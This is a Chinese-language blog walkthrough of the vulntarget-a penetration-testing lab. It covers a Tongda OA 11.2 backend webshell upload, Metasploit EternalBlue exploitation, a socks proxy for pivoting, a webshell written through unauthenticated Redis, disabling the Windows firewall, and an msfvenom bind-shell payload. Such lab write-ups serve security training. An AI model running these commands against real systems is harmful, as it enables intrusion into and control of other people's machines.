域渗透靶场-vulntarget-a综合靶场

nmap发现开放80端口
image
浏览器访问,是通达oa
image
可以搜索poc或者使用oa利用工具拿到shell
通过账号admin 密码滞空,进入后台
image
我们这里使用通达OA 11.2 后台getshell

点击系统管理 -> 系统参数设置 -> OA服务设置 找到Webroot目录
image

点击系统管理 -> 附件管理 -> 添加存储目录
image

点击组织 -> 系统管理员 -> 上传附件
上传txt文件,抓包修改一句话木马,蚁剑或者哥斯拉连接
image
路径以及文件地址已给出,自行拼接,蚁剑getshell
image
信息收集,发现第二张网卡:
image
可以先让这台机器上线msf,建立路由,进行对20网段的渗透

use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.135.152
set lhost 192.168.135.128
set lport 4444
run
image
添加一下路由
image
开启一下代理,可以进行内网渗透了
use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
run
image
利用auxiliary/server/socks_proxy模块开启socks代理

use auxiliary/server/socks_proxy
set version 4a
run
image

redis未授权访问,写入webshell
proxychains4 redis-cli -h 10.0.20.99
config set dir 'C:/phpStudy/PHPTutorial/WWW/'
config set dbfilename shell.php
set 1 ""
save
image
哥斯拉连接
proxychains4 java -jar godzilla.jar
image
关闭win2016防火墙,上传msf生成的bind_shell
netsh advfirewall set allprofiles state off #关闭防火墙

msfvenom生成shell

msfvenom -p windows/x64/meterpreter/bind_tcp rhost=10.0.20.99 lport=4444 -f exe -o shell.exe
image
上传到哥斯拉,并执行
image

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值